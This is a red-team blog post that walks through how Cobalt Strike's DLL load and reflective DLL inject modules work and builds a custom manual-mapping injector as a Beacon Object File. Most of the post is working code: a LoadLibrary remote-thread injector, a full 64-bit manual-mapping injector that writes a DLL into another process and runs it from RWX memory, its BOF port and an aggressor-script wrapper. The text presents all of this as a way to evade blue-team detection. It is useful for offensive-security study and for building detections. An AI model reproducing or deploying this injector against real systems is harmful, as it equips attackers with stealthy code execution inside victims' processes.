Full code for this project can be found here

Cobalt Strike is a widely used C2 framework created to allow red teams to carry out adversary simulations. It can be extremely powerful allowing with key features such as malleable C2 profiles, essentially making traffic look more legitimate when going across a network (i.e. user-agent, headers etc...). As well as implementing a wide array of post exploitation modules which can allow a red teamer to traverse around while remaining relatively OPSEC safe. It has become possible, with the recent addition of beacon object files, to implement a custom version of a pre-existing module. There are two modules in particular i'd like to take a look at:

    dllinject                 Inject a Reflective DLL into a process
    dllload                   Load DLL into a process with LoadLibrary()

DLL Load

We'll start with the simpler of the two modules, dllload. This module works by opening a handle to the process we're going to inject into. Then we get the address of LoadLibrary in memory, via GetProcAddress. From here, a page of memory is allocated in the remote process; writing the full dll path into the newly allocated buffer. Finally we create a thread in the remote process which calls LoadLibrary with the dll path as a argument. In code form it would look something like this:

BOOL InjectDll(DWORD procID, char* dllName) {
    char fullDllName[MAX_PATH];
    LPVOID loadLibrary;
    LPVOID remoteString;

    if (procID == 0) {
        return FALSE;
    }

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
    if (hProc == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    GetFullPathNameA(dllName, MAX_PATH, fullDllName, NULL);
    std::cout << "[+] Aquired full DLL path: " << fullDllName << std::endl;

    loadLibrary = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    remoteString = VirtualAllocEx(hProc, NULL, strlen(fullDllName), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    WriteProcessMemory(hProc, remoteString, fullDllName, strlen(fullDllName), NULL);
    CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)loadLibrary, (LPVOID)remoteString, NULL, NULL);

    CloseHandle(hProc);
    return TRUE;
}

Some of the caveats of this technique are:

  • DLL has to be dropped to disk.
  • LoadLibrary can be hooked in the remote process. Blocking our injection attempts.
  • The module can be seen in the module list.
  • New thread is created on injection.
  • Even if the process is removed from the PEB, NtQueryVirtualMemory can find the dll as it's linked to the EPROCESS structure in the kernel.

That's far too many detection vectors. How does cobalt solve this?

DLL Inject

Cobalt's DLL inject module solves a lot of the issues mentioned in the previous section. DLL inject, or reflective dll injection, is essentially an implementation of the LoadLibrary WINAPI function. Due to the fact we implement LoadLibrary ourselves it's naturally more stealthy than the DLL Load technique. There are a few advantages to doing it this way. Firstly, new modules are not added to the PEB i.e. don't show up as loaded modules. Secondly, the loaded dll does not have to touch disk, really useful as we want our payloads to reside mostly in memory writing to disk as a last resort. Finally, we bypass any hooks that may be placed on LoadLibrary or LdrLoadDll, which may be used to block our injection attempts.

What does DLL inject do? As I mentioned earlier cobalt strike is using reflective dll injection, a technique first devised by Stephen Fewer, the idea is to copy a dll to a remote process, then hand execution to an exported function that implements the following:

  • Parse the PE header.
  • Relocate offsets if required.
  • Resolve any dependencies.
  • Call the DLL entry point (DllMain).

This technique is very effective and fairly OPSEC safe. However, the main issue I have with this implementation is that you have to include reflective dll loader code in your dll, essentially meaning that we have include an exported function that will fix the IAT (import address table) and any relocation's which have to be done in order for the PE to run correctly.

Creating an injector

Now that we have an idea of how cobalt strike handles dll injection we can start looking at creating our own injector based on the reflective dll injection technique that cobalt uses, while having it work on any dll we throw at it without any pre-configuration, or access to the original source code, required.

To create this injector i'm going to use a slightly different technique called manual mapping which carries out the same steps as reflective dll injection, handling relocation's and dynamically loading dependencies (etc..), but does all this from the injector so the dll doesn't have to include any additional code.

My implementation uses the ManualMap repo by Zer0Mem0ry as a base, the code i've implemented will only works on 64-bit processes. I've tried to comment as much as possible so it's easier to understand all parts of the code.

// Include windows API functions
#include <Windows.h>

// Define api functions so that they can be used with GetProcAddress without the
// compiler complaining
typedef HMODULE(__stdcall* pLoadLibraryA)(LPCSTR);
typedef FARPROC(__stdcall* pGetProcAddress)(HMODULE, LPCSTR);

// Dll main typedef so that we can invoke it properly from the injector
typedef INT(__stdcall* dllmain)(HMODULE, DWORD, LPVOID);

// Stucture to be passed to the remote process so it has
// somewhere to start from
struct RemoteData
{
	LPVOID ImageBase;

	PIMAGE_NT_HEADERS NtHeaders;
	PIMAGE_BASE_RELOCATION BaseReloc;
	PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;

	pLoadLibraryA fnLoadLibraryA;
	pGetProcAddress fnGetProcAddress;

};

// Called in the remote process to handle image relocations and imports
DWORD __stdcall LibraryLoader(LPVOID Memory)
{

	RemoteData* remoteParams = (RemoteData*)Memory;

	PIMAGE_BASE_RELOCATION pIBR = remoteParams->BaseReloc;

	DWORD64 delta = (DWORD64)((LPBYTE)remoteParams->ImageBase - remoteParams->NtHeaders->OptionalHeader.ImageBase); // Calculate the delta
	
	// Iterate over relocations
	while (pIBR->VirtualAddress)
	{
		if (pIBR->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION))
		{
			int count = (pIBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(DWORD);
			PWORD list = (PWORD)(pIBR + 1);

			for (int i = 0; i < count; i++)
			{
				if (list[i])
				{
					PDWORD64 ptr = (PDWORD64)((LPBYTE)remoteParams->ImageBase + (pIBR->VirtualAddress + (list[i] & 0xFFF)));
					*ptr += delta;
				}
			}
		}

		pIBR = (PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR + pIBR->SizeOfBlock);
	}

	PIMAGE_IMPORT_DESCRIPTOR pIID = remoteParams->ImportDirectory;

	// Resolve DLL imports
	while (pIID->Characteristics)
	{
		PIMAGE_THUNK_DATA OrigFirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)remoteParams->ImageBase + pIID->OriginalFirstThunk);
		PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)remoteParams->ImageBase + pIID->FirstThunk);

		HMODULE hModule = remoteParams->fnLoadLibraryA((LPCSTR)remoteParams->ImageBase + pIID->Name);

		if (!hModule)
			return FALSE;

		while (OrigFirstThunk->u1.AddressOfData)
		{
			if (OrigFirstThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
			{
				// Import by ordinal
				DWORD64 Function = (DWORD64)remoteParams->fnGetProcAddress(hModule,
					(LPCSTR)(OrigFirstThunk->u1.Ordinal & 0xFFFF));

				if (!Function)
					return FALSE;

				FirstThunk->u1.Function = Function;
			}
			else
			{
				// Import by name
				PIMAGE_IMPORT_BY_NAME pIBN = (PIMAGE_IMPORT_BY_NAME)((LPBYTE)remoteParams->ImageBase + OrigFirstThunk->u1.AddressOfData);
				DWORD64 Function = (DWORD64)remoteParams->fnGetProcAddress(hModule, (LPCSTR)pIBN->Name);
				if (!Function)
					return FALSE;

				FirstThunk->u1.Function = Function;
			}
			OrigFirstThunk++;
			FirstThunk++;
		}
		pIID++;
	}

	// Finally call cast our entry point address to our dllMain typedef
	if (remoteParams->NtHeaders->OptionalHeader.AddressOfEntryPoint)
	{
		dllmain EntryPoint = (dllmain)((LPBYTE)remoteParams->ImageBase + remoteParams->NtHeaders->OptionalHeader.AddressOfEntryPoint);

		return EntryPoint((HMODULE)remoteParams->ImageBase, DLL_PROCESS_ATTACH, NULL); // Call the entry point
	}
	return TRUE;
}

DWORD __stdcall stub()
{
	return 0;
}

int main()
{
	// Can use argc and argv rather than hard coding
	LPCSTR dll = "<INSERT_DLL_HERE>";
	
	// Get the process ID
	DWORD procId = FindProcessId("<Target_Process>");

	RemoteData remoteParams;
	
	// Loads the dll into memory if implementing a beacon file we would start here
	PVOID dllBuffer = LoadFileIntoMem(dll);

	// Find the DOS Header
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBuffer;
	// Find the NT Header from the e_lfanew attribute
	PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)dllBuffer + pDosHeader->e_lfanew);

	// Open a proc use less perms for an actual operation
	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);

	// Allocate a section of memory the size of the dll
	PVOID pModAddress = VirtualAllocEx(hProc, NULL, pNtHeaders->OptionalHeader.SizeOfImage,
		MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Write the headers to the remote process
	WriteProcessMemory(hProc, pModAddress, dllBuffer,
		pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);

	// Copying sections of the dll to the target process
	PIMAGE_SECTION_HEADER pSectHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1);
	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
	{
		WriteProcessMemory(hProc, (PVOID)((LPBYTE)pModAddress + pSectHeader[i].VirtualAddress),
			(PVOID)((LPBYTE)dllBuffer + pSectHeader[i].PointerToRawData), pSectHeader[i].SizeOfRawData, NULL);
	}

	// Allocating memory for the loader code.
	PVOID loaderMem = VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Assign values to remote struct
	remoteParams.ImageBase = pModAddress;
	remoteParams.NtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pModAddress + pDosHeader->e_lfanew);

	remoteParams.BaseReloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
	remoteParams.ImportDirectory = (PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

	remoteParams.fnLoadLibraryA = LoadLibraryA;
	remoteParams.fnGetProcAddress = GetProcAddress;

	// Write remote attributes to the process for our loader code to use
	WriteProcessMemory(hProc, loaderMem, &remoteParams, sizeof(RemoteData), NULL);
	WriteProcessMemory(hProc, (PVOID)((RemoteData*)loaderMem + 1), LibraryLoader,
		(DWORD64)stub - (DWORD64)LibraryLoader, NULL);

	// Create a remote thread in the process and start execution at the loader function
	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)((RemoteData*)loaderMem + 1),
		loaderMem, 0, NULL);

	// Wait for the loader to finish
	WaitForSingleObject(hThread, INFINITE);
	
	// Clean up
	VirtualFreeEx(hProc, loaderMem, 0, MEM_RELEASE);
	CloseHandle(hProc);

	return 0;
}
Sample Manual Mapping code

Using this working sample code we can start to create an implementation using cobalt strike's beacon object files.

Beacon Object Files

Beacon object files are just standard C files that allow for the execution of WinAPI functions as well as additional beacon functions defined in "beacon.h". Let's start by implementing a simple BOF that just prints a string.

#include "beacon.h"

void go(char* buff, int len) 
{
	BeaconPrintf(CALLBACK_OUTPUT, "Working BOF");
}

Then use this MinGW command to compile it to an object file.

# for 32-bit
i686-w64-mingw32-gcc -c inject.c -o inject.o

# for 64-bit
x86_64-w64-mingw32-gcc -c inject.c -o inject.o
inline-execute hello world

Now that we have a base object file to work from we can create a wrapper using an aggressor script so that we don't have to type out the inline-execute command every time we want to use our injector. I came up with the following which takes in an argument of a file path and sends the data in the file path to our BOF.

alias mandllinject {
	local('$handle $data $args $fileData');
	
	# figure out the arch of this session
	$barch = barch($1);
	
	# read in the right BOF file
	$handle = openf(script_resource("inject.o"));
	$data = readb($handle, -1);
	closef($handle);

	$dll_handle = openf($2);
	$file_data = readb($dll_handle, -1);
	closef($dll_handle);

	# pack our arguments
	$args = bof_pack($1, "bi", $file_data, $3);
	
	btask($1, "Manual DLL Inject - @tomcarver_");
	
	# execute it.
	beacon_inline_execute($1, $data, "go", $args);
}
mandllinject <path_to_dll> <procId>

Running the command above will result in the "testdll.dll" file being passed to our beacon. I am able to verify it works by printing the first string in the payload in our BOF, which should be "MZ" as all PE files start with the magic bytes "\x4D\x5A".

Output from mandllinject alias

After verifying the code works all that has to be done now is re implementing the code from earlier in beacon form which just entails converting WINAPI functions into a special beacon format that CS uses, BOF_Helper by @dtmsecurity is really useful here.

Converting the code from earlier to work with cobalt strike I ended up with a minimal version that can migrate a dll from memory into a remote process. Some things to note are: it currently only works in 64 bit processes, move DWORD64s to regular DWORDs (as well as DWORDs to WORDs) in LibraryLoader and vice versa to convert between 64 and 32 bit. Also, there isn't much in terms of error handling; i'll leave that as an exercise for the reader to implement any checks.

#include <windows.h>
#include "beacon.h"

typedef HMODULE(__stdcall* pLoadLibraryA)(LPCSTR);
typedef FARPROC(__stdcall* pGetProcAddress)(HMODULE, LPCSTR);

// Dll main typedef so that we can invoke it properly from the injector
typedef INT(__stdcall* dllmain)(HMODULE, DWORD, LPVOID);

// API imports required by cobalt strike
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$WriteProcessMemory (HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD, BOOL, DWORD);
DECLSPEC_IMPORT WINBASEAPI PVOID WINAPI KERNEL32$VirtualAllocEx (HANDLE, PVOID, DWORD, DWORD, DWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$CreateRemoteThread (HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE, DWORD);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$VirtualFreeEx (HANDLE, PVOID, DWORD, DWORD);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE);

// MinGW was complaining about the way we
// defined the structure previously.
typedef struct
{
	LPVOID ImageBase;

	PIMAGE_NT_HEADERS NtHeaders;
	PIMAGE_BASE_RELOCATION BaseReloc;
	PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;

	pLoadLibraryA fnLoadLibraryA;
	pGetProcAddress fnGetProcAddress;

} RemoteData;

// Called in the remote process to handle image relocations and imports
DWORD __stdcall LibraryLoader(LPVOID Memory)
{
	// Same as before.
}

DWORD __stdcall stub()
{
	return 0;
}

void go(char* argv, int argc) 
{
	PVOID dllBuffer;
    char* sc_ptr;
	int sc_len, procId;
	RemoteData remoteParams;
    datap parser;
	
	BeaconDataParse(&parser, argv, argc);
	sc_len = BeaconDataLength(&parser);
	sc_ptr = BeaconDataExtract(&parser, NULL);
	procId = BeaconDataInt(&parser);
	
	BeaconPrintf(CALLBACK_OUTPUT, "DLL Size %d", sc_len);
	BeaconPrintf(CALLBACK_OUTPUT, "Opening handle to process ID: %d", procId);

	dllBuffer = (PVOID)sc_ptr;
	// Get DOS Header
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBuffer;
	// Find the NT Header from the e_lfanew attribute
	PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)dllBuffer + pDosHeader->e_lfanew);
	
	// Open a proc use less perms for an actual operation
	HANDLE hProc = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);

		// Allocate a section of memory the size of the dll
	PVOID pModAddress = KERNEL32$VirtualAllocEx(hProc, NULL, pNtHeaders->OptionalHeader.SizeOfImage,
		MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Write the headers to the remote process
	KERNEL32$WriteProcessMemory(hProc, pModAddress, dllBuffer,
		pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);

	// Copying sections of the dll to the target process
	PIMAGE_SECTION_HEADER pSectHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1);
	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
	{
		KERNEL32$WriteProcessMemory(hProc, (PVOID)((LPBYTE)pModAddress + pSectHeader[i].VirtualAddress),
			(PVOID)((LPBYTE)dllBuffer + pSectHeader[i].PointerToRawData), pSectHeader[i].SizeOfRawData, NULL);
	}

	// Allocating memory for the loader code.
	PVOID loaderMem = KERNEL32$VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Assign values to remote struct
	remoteParams.ImageBase = pModAddress;
	remoteParams.NtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pModAddress + pDosHeader->e_lfanew);

	remoteParams.BaseReloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
	remoteParams.ImportDirectory = (PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

	remoteParams.fnLoadLibraryA = LoadLibraryA;
	remoteParams.fnGetProcAddress = GetProcAddress;

	// Write remote attributes to the process for our loader code to use
	KERNEL32$WriteProcessMemory(hProc, loaderMem, &remoteParams, sizeof(RemoteData), NULL);
	KERNEL32$WriteProcessMemory(hProc, (PVOID)((RemoteData*)loaderMem + 1), LibraryLoader,
		(DWORD64)stub - (DWORD64)LibraryLoader, NULL);

	// Create a remote thread in the process and start execution at the loader function
	HANDLE hThread = KERNEL32$CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)((RemoteData*)loaderMem + 1),
		loaderMem, 0, NULL);

	BeaconPrintf(CALLBACK_OUTPUT, "Finished injecting DLL.");

	// Clean up
	KERNEL32$CloseHandle(hProc);

	return;
}

Going Further

Now because we have a different injection technique than what cobalt strike usually uses it instantly becomes more difficult blue teams to detect. The icing on the cake is the fact that we can add additional features to the injector. Maybe we want to use a technique like urban bishop where we don't touch WriteProcessMemory instead opting for a shared block of memory. It's now entirely doable and easy to implement, my C++ port can be found here if you're interested in using it in a beacon. Similarly, we may find that we want to nuke the PE header as that has been used to detect reflective dll injection in the past. We could even implement a version of ThreadContinue by , where a thread is hijacked in the remote process in order to run our malicious code.

Final Remarks

I hope this blog post has been informative and you have learnt a bit more about not only how Cobalt Strike implements dll injection but how we can go about creating extra functionality with Beacon Object Files. If you're interested in more content like this follow me on twitter @tomcarver_. Again the full code for this project is available on GitHub here